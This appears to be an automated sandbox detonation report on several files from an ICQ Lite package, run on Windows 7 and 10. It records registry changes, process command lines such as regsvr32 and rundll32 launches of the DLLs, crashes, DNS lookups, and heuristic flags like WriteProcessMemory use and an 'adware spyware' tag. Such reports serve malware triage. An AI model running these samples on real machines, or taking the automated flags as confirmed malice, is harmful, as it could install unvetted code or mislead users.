Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5008 wrote to memory of 4800 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 5008 wrote to memory of 4800 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 5008 wrote to memory of 4800 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:03

Platform

win10v2004-20240221-en

Max time kernel

111s

Max time network

168s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Signatures

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win7-20240221-en

Max time kernel

119s

Max time network

134s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2332 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2332 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2332 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2332 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2332 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2332 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2332 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:03

Platform

win10v2004-20240221-en

Max time kernel

115s

Max time network

168s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4064 wrote to memory of 2584 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4064 wrote to memory of 2584 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4064 wrote to memory of 2584 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2584 -ip 2584

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win7-20240221-en

Max time kernel

123s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win10v2004-20240221-en

Max time kernel

149s

Max time network

155s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\bentonite.png

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\bentonite.png

Network

Country Destination Domain Proto
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 202.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 209.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 175.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win7-20240221-en

Max time kernel

117s

Max time network

129s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Signatures

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3000 wrote to memory of 3016 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3000 wrote to memory of 3016 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3000 wrote to memory of 3016 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3000 wrote to memory of 3016 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3000 wrote to memory of 3016 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3000 wrote to memory of 3016 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3000 wrote to memory of 3016 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win7-20240221-en

Max time kernel

127s

Max time network

139s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 228

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win10v2004-20240221-en

Max time kernel

150s

Max time network

155s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2640 wrote to memory of 3864 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2640 wrote to memory of 3864 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2640 wrote to memory of 3864 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3864 -ip 3864

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 588

Network

Country Destination Domain Proto
US 8.8.8.8:53 147.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

N/A